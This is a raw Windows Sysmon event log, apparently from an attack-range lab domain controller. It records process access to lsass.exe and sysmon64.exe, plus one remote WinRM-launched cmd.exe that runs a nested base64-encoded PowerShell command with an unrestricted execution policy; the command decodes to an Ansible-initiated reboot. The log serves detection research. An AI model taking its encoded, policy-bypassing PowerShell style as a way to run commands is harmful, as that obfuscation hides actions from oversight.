UQBCAGkAQQBHAHcAQQBaAFEAQQBpAEEAQQBvAEEAUwBRAEIAbQBBAEMAQQBBAEsAQQBBAHQAQQBHADQAQQBiAHcAQgAwAEEAQwBBAEEASgBBAEEALwBBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBTAFEAQgBtAEEAQwBBAEEASwBBAEIASABBAEcAVQBBAGQAQQBBAHQAQQBGAFkAQQBZAFEAQgB5AEEARwBrAEEAWQBRAEIAaQBBAEcAdwBBAFoAUQBBAGcAQQBFAHcAQQBRAFEAQgBUAEEARgBRAEEAUgBRAEIAWQBBAEUAawBBAFYAQQBCAEQAQQBFADgAQQBSAEEAQgBGAEEAQwBBAEEATABRAEIARgBBAEgASQBBAGMAZwBCAHYAQQBIAEkAQQBRAFEAQgBqAEEASABRAEEAYQBRAEIAdgBBAEcANABBAEkAQQBCAFQAQQBHAGsAQQBiAEEAQgBsAEEARwA0AEEAZABBAEIAcwBBAEgAawBBAFEAdwBCAHYAQQBHADQAQQBkAEEAQgBwAEEARwA0AEEAZABRAEIAbABBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBaAFEAQgA0AEEARwBrAEEAZABBAEEAZwBBAEMAUQBBAFQAQQBCAEIAQQBGAE0AQQBWAEEAQgBGAEEARgBnAEEAUwBRAEIAVQBBAEUATQBBAFQAdwBCAEUAQQBFAFUAQQBJAEEAQgA5AEEAQwBBAEEAUgBRAEIAcwBBAEgATQBBAFoAUQBBAGcAQQBIAHMAQQBJAEEAQgBsAEEASABnAEEAYQBRAEIAMABBAEMAQQBBAE0AUQBBAGcAQQBIADAAQQBJAEEAQgA5AEEAQQA9AD0AC:\Users\Administrator\ATTACKRANGE\Administrator{5D479F2C-167B-5F84-41E1-110000000000}0x11e1410HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{5D479F2C-167B-5F84-1203-000000007E01}4032C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAAVQB3AEIAbABBAEgAUQBBAEwAUQBCAFQAQQBIAFEAQQBjAGcAQgBwAEEARwBNAEEAZABBAEIATgBBAEcAOABBAFoAQQBCAGwAQQBDAEEAQQBMAFEAQgBXAEEARwBVAEEAYwBnAEIAegBBAEcAawBBAGIAdwBCAHUAQQBDAEEAQQBUAEEAQgBoAEEASABRAEEAWgBRAEIAegBBAEgAUQBBAEMAZwBCAHoAQQBHAGcAQQBkAFEAQgAwAEEARwBRAEEAYgB3AEIAMwBBAEcANABBAEkAQQBBAHYAQQBIAEkAQQBJAEEAQQB2AEEASABRAEEASQBBAEEAeQBBAEMAQQBBAEwAdwBCAGoAQQBDAEEAQQBJAGcAQgBTAEEARwBVAEEAWQBnAEIAdgBBAEcAOABBAGQAQQBBAGcAQQBHAGsAQQBiAGcAQgBwAEEASABRAEEAYQBRAEIAaABBAEgAUQBBAFoAUQBCAGsAQQBDAEEAQQBZAGcAQgA1AEEAQwBBAEEAUQBRAEIAdQBBAEgATQBBAGEAUQBCAGkAQQBHAHcAQQBaAFEAQQBpAEEAQQBvAEEAUwBRAEIAbQBBAEMAQQBBAEsAQQBBAHQAQQBHADQAQQBiAHcAQgAwAEEAQwBBAEEASgBBAEEALwBBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBTAFEAQgBtAEEAQwBBAEEASwBBAEIASABBAEcAVQBBAGQAQQBBAHQAQQBGAFkAQQBZAFEAQgB5AEEARwBrAEEAWQBRAEIAaQBBAEcAdwBBAFoAUQBBAGcAQQBFAHcAQQBRAFEAQgBUAEEARgBRAEEAUgBRAEIAWQBBAEUAawBBAFYAQQBCAEQAQQBFADgAQQBSAEEAQgBGAEEAQwBBAEEATABRAEIARgBBAEgASQBBAGMAZwBCAHYAQQBIAEkAQQBRAFEAQgBqAEEASABRAEEAYQBRAEIAdgBBAEcANABBAEkAQQBCAFQAQQBHAGsAQQBiAEEAQgBsAEEARwA0AEEAZABBAEIAcwBBAEgAawBBAFEAdwBCAHYAQQBHADQAQQBkAEEAQgBwAEEARwA0AEEAZABRAEIAbABBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBaAFEAQgA0AEEARwBrAEEAZABBAEEAZwBBAEMAUQBBAFQAQQBCAEIAQQBGAE0AQQBWAEEAQgBGAEEARgBnAEEAUwBRAEIAVQBBAEUATQBBAFQAdwBCAEUAQQBFAFUAQQBJAEEAQgA5AEEAQwBBAEEAUgBRAEIAcwBBAEgATQBBAFoAUQBBAGcAQQBIAHMAQQBJAEEAQgBsAEEASABnAEEAYQBRAEIAMABBAEMAQQBBAE0AUQBBAGcAQQBIADAAQQBJAEEAQgA5AEEAQQA9AD0A 10341000x8000000000000000497Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.696{5D479F2C-1504-5F84-0B00-000000007E01}8603768C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000496Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.696{5D479F2C-1504-5F84-0B00-000000007E01}8603768C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000495Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.696{5D479F2C-1504-5F84-0B00-000000007E01}8603768C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+1b05d|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000494Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.696{5D479F2C-167B-5F84-0F03-000000007E01}44684280C:\Windows\system32\conhost.exe{5D479F2C-167B-5F84-1203-000000007E01}4032C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000493Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.696{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000492Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.696{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000491Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.696{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000490Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.696{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000489Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.696{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000488Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.696{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000487Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.696{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000486Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.696{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000485Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.696{5D479F2C-1506-5F84-0C00-000000007E01}5721064C:\Windows\system32\svchost.exe{5D479F2C-1676-5F84-F402-000000007E01}4628C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000484Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.696{5D479F2C-14FE-5F84-0500-000000007E01}640760C:\Windows\system32\csrss.exe{5D479F2C-167B-5F84-1203-000000007E01}4032C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+6e87f 10341000x8000000000000000483Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.696{5D479F2C-167B-5F84-0E03-000000007E01}50841256C:\Windows\system32\WinrsHost.exe{5D479F2C-167B-5F84-1203-000000007E01}4032C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7194|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\WinrsHost.exe+2c94|C:\Windows\system32\WinrsHost.exe+2eb1|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+7d09|C:\Windows\System32\combase.dll+22b9|C:\Windows\System32\RPCRT4.dll+b42b|C:\Windows\System32\combase.dll+53b8c|C:\Windows\System32\combase.dll+53842|C:\Windows\System32\combase.dll+51968|C:\Windows\System32\combase.dll+4fedd|C:\Windows\System32\combase.dll+4f5bf|C:\Windows\System32\combase.dll+6da09|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5982e|C:\Windows\System32\RPCRT4.dll+39257|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb 154100x8000000000000000482Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.707{5D479F2C-167B-5F84-1203-000000007E01}4032C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /C PowerShell -NoProfile -NonInteractive -ExecutionPolicy Unrestricted -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0ATgBvAFAAcgBvAGYAaQBsAGUAIAAtAE4AbwBuAEkAbgB0AGUAcgBhAGMAdABpAHYAZQAgAC0ARQB4AGUAYwB1AHQAaQBvAG4AUABvAGwAaQBjAHkAIABVAG4AcgBlAHMAdAByAGkAYwB0AGUAZAAgAC0ARQBuAGMAbwBkAGUAZABDAG8AbQBtAGEAbgBkACAAVQB3AEIAbABBAEgAUQBBAEwAUQBCAFQAQQBIAFEAQQBjAGcAQgBwAEEARwBNAEEAZABBAEIATgBBAEcAOABBAFoAQQBCAGwAQQBDAEEAQQBMAFEAQgBXAEEARwBVAEEAYwBnAEIAegBBAEcAawBBAGIAdwBCAHUAQQBDAEEAQQBUAEEAQgBoAEEASABRAEEAWgBRAEIAegBBAEgAUQBBAEMAZwBCAHoAQQBHAGcAQQBkAFEAQgAwAEEARwBRAEEAYgB3AEIAMwBBAEcANABBAEkAQQBBAHYAQQBIAEkAQQBJAEEAQQB2AEEASABRAEEASQBBAEEAeQBBAEMAQQBBAEwAdwBCAGoAQQBDAEEAQQBJAGcAQgBTAEEARwBVAEEAWQBnAEIAdgBBAEcAOABBAGQAQQBBAGcAQQBHAGsAQQBiAGcAQgBwAEEASABRAEEAYQBRAEIAaABBAEgAUQBBAFoAUQBCAGsAQQBDAEEAQQBZAGcAQgA1AEEAQwBBAEEAUQBRAEIAdQBBAEgATQBBAGEAUQBCAGkAQQBHAHcAQQBaAFEAQQBpAEEAQQBvAEEAUwBRAEIAbQBBAEMAQQBBAEsAQQBBAHQAQQBHADQAQQBiAHcAQgAwAEEAQwBBAEEASgBBAEEALwBBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBTAFEAQgBtAEEAQwBBAEEASwBBAEIASABBAEcAVQBBAGQAQQBBAHQAQQBGAFkAQQBZAFEAQgB5AEEARwBrAEEAWQBRAEIAaQBBAEcAdwBBAFoAUQBBAGcAQQBFAHcAQQBRAFEAQgBUAEEARgBRAEEAUgBRAEIAWQBBAEUAawBBAFYAQQBCAEQAQQBFADgAQQBSAEEAQgBGAEEAQwBBAEEATABRAEIARgBBAEgASQBBAGMAZwBCAHYAQQBIAEkAQQBRAFEAQgBqAEEASABRAEEAYQBRAEIAdgBBAEcANABBAEkAQQBCAFQAQQBHAGsAQQBiAEEAQgBsAEEARwA0AEEAZABBAEIAcwBBAEgAawBBAFEAdwBCAHYAQQBHADQAQQBkAEEAQgBwAEEARwA0AEEAZABRAEIAbABBAEMAawBBAEkAQQBCADcAQQBDAEEAQQBaAFEAQgA0AEEARwBrAEEAZABBAEEAZwBBAEMAUQBBAFQAQQBCAEIAQQBGAE0AQQBWAEEAQgBGAEEARgBnAEEAUwBRAEIAVQBBAEUATQBBAFQAdwBCAEUAQQBFAFUAQQBJAEEAQgA5AEEAQwBBAEEAUgBRAEIAcwBBAEgATQBBAFoAUQBBAGcAQQBIAHMAQQBJAEEAQgBsAEEASABnAEEAYQBRAEIAMABBAEMAQQBBAE0AUQBBAGcAQQBIADAAQQBJAEEAQgA5AEEAQQA9AD0AC:\Users\Administrator\ATTACKRANGE\Administrator{5D479F2C-167B-5F84-41E1-110000000000}0x11e1410HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{5D479F2C-167B-5F84-0E03-000000007E01}5084C:\Windows\System32\winrshost.exeC:\Windows\system32\WinrsHost.exe -Embedding 10341000x8000000000000000481Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.696{5D479F2C-1504-5F84-0B00-000000007E01}8603768C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1e0a8|C:\Windows\system32\lsasrv.dll+1d2d1|C:\Windows\system32\lsasrv.dll+1bb00|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000480Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 08:40:27.696{5D479F2C-1504-5F84-0B00-000000007E01}8603768C:\Windows\system32\lsass.exe{5D479F2C-1507-5F84-1300-000000007E01}1308C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5ec4|C:\Windows\system32\lsasrv.dll+11c6e|C:\Windows\system32\lsasrv.dll+1a4e6|C:\Windows\system32\lsasrv.dll+1ba8f|C:\Windows\system32\lsasrv.dll+2810b|C:\Windows\SYSTEM32\SspiSrv.dll+1467|C:\Windows\System32\RPCRT4.dll+78343|C:\Windows\System32\RPCRT4.dll+dbc0d|C:\Windows\System32\RPCRT4.dll+b3dc|C:\Windows\System32\RPCRT4.dll+59dc4|C:\Windows\System32\RPCRT4.dll+58cdd|C:\Windows\System32\RPCRT4.dll+5958b|C:\Windows\System32\RPCRT4.dll+3942c|C:\Windows\System32\RPCRT4.dll+398ac|C:\Windows\System32\RPCRT4.dll+53e9c|C:\Windows\System32\RPCRT4.dll+556fb|C:\Windows\System32\RPCRT4.dll+481da|C:\Windows\SYSTEM32\ntdll.dll+286be|C:\Windows\SYSTEM32\ntdll.dll+2a029|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+6e871 10341000x8000000000000000479Microsoft-Windows-Sysmon/Operationalwin-dc-3574060.attackrange.local-2020-10-12 